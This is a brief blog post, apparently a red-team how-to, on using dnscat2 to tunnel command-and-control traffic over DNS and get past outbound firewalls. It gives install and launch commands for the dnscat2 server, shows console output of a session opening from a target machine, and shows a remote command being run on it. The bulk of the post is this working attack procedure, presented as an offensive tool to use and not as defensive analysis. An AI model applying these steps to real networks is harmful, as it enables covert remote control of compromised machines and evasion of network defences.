Using dnscat2 for tunneling bypass Firewall Outbound

Posted byNhat TruongPosted inHacking & RED TEAM, Local Attack, Security ToolsTags:, , , , , ,

Step 1: Check outbound internet availability

Step 2: Install dnscat2 by your way

(Use this if you don’t mind the detection.)

# apt-get update
# apt-get -y install ruby-dev git make g++
# gem install bundler
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/server
# bundle install

Step 3: Run ruby ./dnscat2.rb

 # ruby ./dnscat2.rb (# ruby ./dnscat2.rb abc.com //), if target runs windows, use this https://downloads.skullsecurity.org/dnscat2/

Step 4:

# ruby ./dnscat2.rb (# ruby ./dnscat2.rb abc.com)
Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]…
No domains were selected, which means this server will only respond to direct queries (using –host and –port on the client)
dnscat2> New session established: 16059
dnscat2>

Step 5:

dnscat2> session -i 16059
Welcome to a command session!
Use ‘help’ for a list of commands or ^z for the main menu
dnscat [command: 16059]> exec notepad.exe
Sent request to execute
dnscat [command: 16059]>

Published by Nhat Truong

Hi

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

%d bloggers like this: